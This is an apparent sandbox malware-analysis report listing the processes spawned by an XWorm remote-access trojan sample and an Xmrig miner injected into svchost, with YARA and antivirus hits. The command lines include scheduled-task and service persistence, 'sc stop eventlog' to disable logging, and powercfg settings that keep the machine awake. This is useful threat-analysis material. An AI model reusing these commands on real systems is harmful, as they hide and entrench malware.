                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, Author: Joe Security
                                                                                                                                            • Rule: rat_win_xworm_v2, Description: Finds XWorm v2 samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, Author: Sekoia.io
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 53%, ReversingLabs
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:21
                                                                                                                                            Start time:17:44:23
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe"
                                                                                                                                            Imagebase:0x340000
                                                                                                                                            File size:560'640 bytes
                                                                                                                                            MD5 hash:75C2C9D60104BA3C4271B2A629E90023
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.2849008746.0000000000DE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.2873162954.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.2971352807.00000000130D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:22
                                                                                                                                            Start time:17:44:23
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\pcqxl.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\pcqxl.exe
                                                                                                                                            Imagebase:0x7ff6db010000
                                                                                                                                            File size:2'625'536 bytes
                                                                                                                                            MD5 hash:382DC2CC6405B237FA73B03EF0B52327
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:23
                                                                                                                                            Start time:17:44:25
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:24
                                                                                                                                            Start time:17:44:24
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                            File size:235'008 bytes
                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:25
                                                                                                                                            Start time:17:44:24
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:26
                                                                                                                                            Start time:17:44:25
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:27
                                                                                                                                            Start time:17:44:25
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:28
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:29
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:30
                                                                                                                                            Start time:17:44:25
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                            Imagebase:0xd80000
                                                                                                                                            File size:482'304 bytes
                                                                                                                                            MD5 hash:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:31
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:32
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:33
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:34
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe delete "RNRFMTFS"
                                                                                                                                            Imagebase:0x7ff6efea0000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:35
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0xb0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:37
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto"
                                                                                                                                            Imagebase:0x7ff6efea0000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:38
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:39
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                            Imagebase:0x7ff6efea0000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:40
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe start "RNRFMTFS"
                                                                                                                                            Imagebase:0x7ff6efea0000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:41
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:42
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:43
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe
                                                                                                                                            Imagebase:0x7ff7ae5c0000
                                                                                                                                            File size:2'625'536 bytes
                                                                                                                                            MD5 hash:382DC2CC6405B237FA73B03EF0B52327
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 78%, ReversingLabs
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:44
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:45
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:46
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:47
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:48
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:49
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:50
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:51
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:52
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:53
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:svchost.exe
                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                            File size:55'320 bytes
                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:54
                                                                                                                                            Start time:17:44:36
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                                                                                                                                            Imagebase:0x9e0000
                                                                                                                                            File size:482'304 bytes
                                                                                                                                            MD5 hash:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:55
                                                                                                                                            Start time:17:44:47
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe"
                                                                                                                                            Imagebase:0x7ff6f0600000
                                                                                                                                            File size:24'997'182 bytes
                                                                                                                                            MD5 hash:9D60674507EA97985C7E3B08D610F8D7
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 13%, ReversingLabs
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:56
                                                                                                                                            Start time:17:44:47
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                                                                                                                                            Imagebase:0x910000
                                                                                                                                            File size:482'304 bytes
                                                                                                                                            MD5 hash:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:3.6%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:3.7%
                                                                                                                                              Total number of Nodes:754
                                                                                                                                              Total number of Limit Nodes:16
                                                                                                                                              execution_graph 12669 e59ba5 12670 e59ba7 12669->12670 12671 e55c10 6 API calls 12670->12671 12672 e59cb1 12671->12672 12673 e58b30 6 API calls 12672->12673 12674 e59cc2 12673->12674 11968 e86629 11971 e864c7 11968->11971 11972 e864d5 __cftof 11971->11972 11973 e86520 11972->11973 11976 e8652b 11972->11976 11975 e8652a 11982 e8a302 GetPEB 11976->11982 11978 e86535 11979 e8654a __cftof 11978->11979 11980 e8653a GetPEB 11978->11980 11981 e86562 ExitProcess 11979->11981 11980->11979 11983 e8a31c __cftof 11982->11983 11983->11978 12179 e5b1a0 12180 e5b1f2 12179->12180 12181 e5b3ad CoInitialize 12180->12181 12182 e5b3fa shared_ptr __floor_pentium4 12181->12182 12340 e520a0 12341 e6c68b __Mtx_init_in_situ 2 API calls 12340->12341 12342 e520ac 12341->12342 12492 e53fe0 12493 e54022 12492->12493 12494 e540d2 12493->12494 12495 e5408c 12493->12495 12498 e54035 __floor_pentium4 12493->12498 12505 e53ee0 12494->12505 12499 e535e0 12495->12499 12500 e53616 12499->12500 12504 e5364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 12500->12504 12511 e52ce0 12500->12511 12502 e5369e 12502->12504 12520 e52c00 12502->12520 12504->12498 12506 e53f1e 12505->12506 12507 e53f48 12505->12507 12506->12498 12508 e53f58 12507->12508 12509 e52c00 3 API calls 12507->12509 12508->12498 12510 e53f7f 12509->12510 12510->12498 12512 e52d1d 12511->12512 12513 e6bedf InitOnceExecuteOnce 12512->12513 12514 e52d46 12513->12514 12515 e52d51 __floor_pentium4 12514->12515 12517 e52d88 12514->12517 12527 e6bef7 12514->12527 12515->12502 12518 e52440 4 API calls 12517->12518 12519 e52d9b 12518->12519 12519->12502 12521 e52c0e 12520->12521 12540 e6b847 12521->12540 12523 e52c42 12524 e52c49 12523->12524 12546 e52c80 12523->12546 12524->12504 12526 e52c58 std::_Throw_future_error 12528 e6bf03 std::_Throw_future_error 12527->12528 12529 e6bf73 12528->12529 12530 e6bf6a 12528->12530 12532 e52ae0 5 API calls 12529->12532 12534 e6be7f 12530->12534 12533 e6bf6f 12532->12533 12533->12517 12535 e6cc31 InitOnceExecuteOnce 12534->12535 12536 e6be97 12535->12536 12537 e6be9e 12536->12537 12538 e86cbb 4 API calls 12536->12538 12537->12533 12539 e6bea7 12538->12539 12539->12533 12541 e6b854 12540->12541 12542 e6b873 Concurrency::details::_Reschedule_chore 12540->12542 12549 e6cb77 12541->12549 12542->12523 12544 e6b864 12544->12542 12551 e6b81e 12544->12551 12557 e6b7fb 12546->12557 12548 e52cb2 shared_ptr 12548->12526 12550 e6cb92 CreateThreadpoolWork 12549->12550 12550->12544 12552 e6b827 Concurrency::details::_Reschedule_chore 12551->12552 12555 e6cdcc 12552->12555 12554 e6b841 12554->12542 12556 e6cde1 TpPostWork 12555->12556 12556->12554 12558 e6b807 12557->12558 12559 e6b817 12557->12559 12558->12559 12561 e6ca78 12558->12561 12559->12548 12562 e6ca8d TpReleaseWork 12561->12562 12562->12559 12790 e54120 12791 e5416a 12790->12791 12792 e53ee0 3 API calls 12791->12792 12793 e541b2 __floor_pentium4 12791->12793 12792->12793 12794 e5af20 12795 e5af63 12794->12795 12806 e86660 12795->12806 12800 e8663f 4 API calls 12801 e5af80 12800->12801 12802 e8663f 4 API calls 12801->12802 12803 e5af98 __cftof 12802->12803 12812 e555f0 12803->12812 12805 e5b04e shared_ptr __floor_pentium4 12807 e8a671 __cftof 4 API calls 12806->12807 12808 e5af69 12807->12808 12809 e8663f 12808->12809 12810 e8a671 __cftof 4 API calls 12809->12810 12811 e5af71 12810->12811 12811->12800 12813 e55610 12812->12813 12815 e55710 __floor_pentium4 12813->12815 12816 e522c0 12813->12816 12815->12805 12819 e52280 12816->12819 12820 e52296 12819->12820 12823 e887f8 12820->12823 12826 e87609 12823->12826 12825 e522a4 12825->12813 12827 e87649 12826->12827 12831 e87631 __cftof __floor_pentium4 12826->12831 12828 e8690a __cftof 4 API calls 12827->12828 12827->12831 12829 e87661 12828->12829 12832 e87bc4 12829->12832 12831->12825 12834 e87bd5 12832->12834 12833 e87be4 __cftof 12833->12831 12834->12833 12839 e88168 12834->12839 12844 e87dc2 12834->12844 12849 e87de8 12834->12849 12859 e87f36 12834->12859 12840 e88178 12839->12840 12841 e88171 12839->12841 12840->12834 12868 e87b50 12841->12868 12843 e88177 12843->12834 12845 e87dcb 12844->12845 12846 e87dd2 12844->12846 12847 e87b50 4 API calls 12845->12847 12846->12834 12848 e87dd1 